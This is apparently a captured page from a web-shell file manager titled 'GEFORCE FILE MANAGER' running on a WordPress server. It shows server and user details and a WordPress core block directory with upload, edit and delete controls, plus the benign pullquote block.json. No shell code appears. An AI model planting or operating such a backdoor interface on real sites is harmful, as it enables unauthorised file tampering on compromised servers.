[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-includes
/
blocks
/
pullquote
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 block.json
1,923 B
SET
[ EDIT ]
|
[ DEL ]
📄 editor-rtl.css
243 B
SET
[ EDIT ]
|
[ DEL ]
📄 editor-rtl.min.css
222 B
SET
[ EDIT ]
|
[ DEL ]
📄 editor.css
243 B
SET
[ EDIT ]
|
[ DEL ]
📄 editor.min.css
222 B
SET
[ EDIT ]
|
[ DEL ]
📄 style-rtl.css
1,248 B
SET
[ EDIT ]
|
[ DEL ]
📄 style-rtl.min.css
1,118 B
SET
[ EDIT ]
|
[ DEL ]
📄 style.css
1,248 B
SET
[ EDIT ]
|
[ DEL ]
📄 style.min.css
1,118 B
SET
[ EDIT ]
|
[ DEL ]
📄 theme-rtl.css
312 B
SET
[ EDIT ]
|
[ DEL ]
📄 theme-rtl.min.css
283 B
SET
[ EDIT ]
|
[ DEL ]
📄 theme.css
312 B
SET
[ EDIT ]
|
[ DEL ]
📄 theme.min.css
283 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: block.json
{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/pullquote", "title": "Pullquote", "category": "text", "description": "Give special visual emphasis to a quote from your text.", "textdomain": "default", "attributes": { "value": { "type": "rich-text", "source": "rich-text", "selector": "p", "role": "content" }, "citation": { "type": "rich-text", "source": "rich-text", "selector": "cite", "role": "content" }, "textAlign": { "type": "string" } }, "supports": { "anchor": true, "align": [ "left", "right", "wide", "full" ], "background": { "backgroundImage": true, "backgroundSize": true, "__experimentalDefaultControls": { "backgroundImage": true } }, "color": { "gradients": true, "background": true, "link": true, "__experimentalDefaultControls": { "background": true, "text": true } }, "dimensions": { "minHeight": true, "__experimentalDefaultControls": { "minHeight": false } }, "spacing": { "margin": true, "padding": true }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } }, "__experimentalBorder": { "color": true, "radius": true, "style": true, "width": true, "__experimentalDefaultControls": { "color": true, "radius": true, "style": true, "width": true } }, "__experimentalStyle": { "typography": { "fontSize": "1.5em", "lineHeight": "1.6" } }, "interactivity": { "clientNavigation": true } }, "editorStyle": "wp-block-pullquote-editor", "style": "wp-block-pullquote" }